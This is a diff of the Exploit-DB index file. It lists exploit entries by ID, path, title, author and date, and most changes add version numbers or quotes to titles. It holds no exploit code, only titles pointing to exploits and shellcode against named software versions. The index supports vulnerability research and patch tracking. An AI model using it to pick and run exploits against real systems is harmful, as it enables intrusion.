1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 @@ -23209,7 +23209,7 @@ id,file,description,date,author,platform,type,port 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 -26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80 +26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 @@ -23325,7 +23325,7 @@ id,file,description,date,author,platform,type,port 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26124,platforms/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 -26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Parameter Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0 @@ -23455,7 +23455,7 @@ id,file,description,date,author,platform,type,port 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0 -26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - password_reminder.php SQL Injection",2005-09-14,rgod,php,webapps,0 +26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,php,webapps,0 26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0 26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - 'index.php' SQL Injection",2005-09-14,trueend5,php,webapps,0 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0 @@ -23612,9 +23612,9 @@ id,file,description,date,author,platform,type,port 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 -26431,platforms/php/webapps/26431.txt,"ATutor 1.x - forum.inc.php Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 -26432,platforms/php/webapps/26432.txt,"ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 -26433,platforms/php/webapps/26433.txt,"ATutor 1.x - print.php section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 +26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 +26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 +26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum - error.asp Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps,0 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",php,webapps,0 @@ -25296,10 +25296,10 @@ id,file,description,date,author,platform,type,port 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 -28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos,0 @@ -26582,7 +26582,7 @@ id,file,description,date,author,platform,type,port 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow SEH Exploit (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0 -30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation (via Local File Inclusion)",2013-12-06,rubina119,linux,webapps,0 +30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 @@ -27439,7 +27439,7 @@ id,file,description,date,author,platform,type,port 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80 -30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071 +30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080 30474,platforms/windows/remote/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-12-24,Metasploit,windows,remote,0 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 @@ -29133,7 +29133,7 @@ id,file,description,date,author,platform,type,port 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 +32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 @@ -29367,11 +29367,11 @@ id,file,description,date,author,platform,type,port 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 32502,platforms/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 -32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 +32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 -32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 +32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 @@ -31317,7 +31317,7 @@ id,file,description,date,author,platform,type,port 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 -34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80 +34669,platforms/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,multiple,remote,8400 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,java,remote,9000 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090 @@ -31393,7 +31393,7 @@ id,file,description,date,author,platform,type,port 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - listads.php Multiple Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - subclass.php cname Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 +34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 40338,platforms/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 @@ -31408,7 +31408,7 @@ id,file,description,date,author,platform,type,port 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 34762,platforms/php/webapps/34762.txt,"WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 -34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 +34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 @@ -31664,7 +31664,7 @@ id,file,description,date,author,platform,type,port 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 -35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 +35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 @@ -32148,7 +32148,7 @@ id,file,description,date,author,platform,type,port 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 -35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection)",2014-12-19,Wireghoul,php,webapps,0 +35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 @@ -32158,7 +32158,7 @@ id,file,description,date,author,platform,type,port 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000 +35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0 35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category Parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 @@ -32566,7 +32566,7 @@ id,file,description,date,author,platform,type,port 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,php,webapps,0 -36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 +36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 36058,platforms/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 @@ -34447,8 +34447,8 @@ id,file,description,date,author,platform,type,port 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 -38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 -38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 +38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 +38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0 @@ -34856,7 +34856,7 @@ id,file,description,date,author,platform,type,port 38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38478,platforms/php/webapps/38478.txt,"Sosci Survey - Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 -38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 +38480,platforms/php/webapps/38480.txt,"Fork CMS - 'js.php' Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 @@ -34934,7 +34934,7 @@ id,file,description,date,author,platform,type,port 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 -38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 +38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 38565,platforms/php/webapps/38565.txt,"Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 @@ -34991,7 +34991,7 @@ id,file,description,date,author,platform,type,port 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 -38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 +38630,platforms/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 @@ -35059,7 +35059,7 @@ id,file,description,date,author,platform,type,port 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 -38695,platforms/php/webapps/38695.txt,"CakePHP - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 +38695,platforms/php/webapps/38695.txt,"CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image 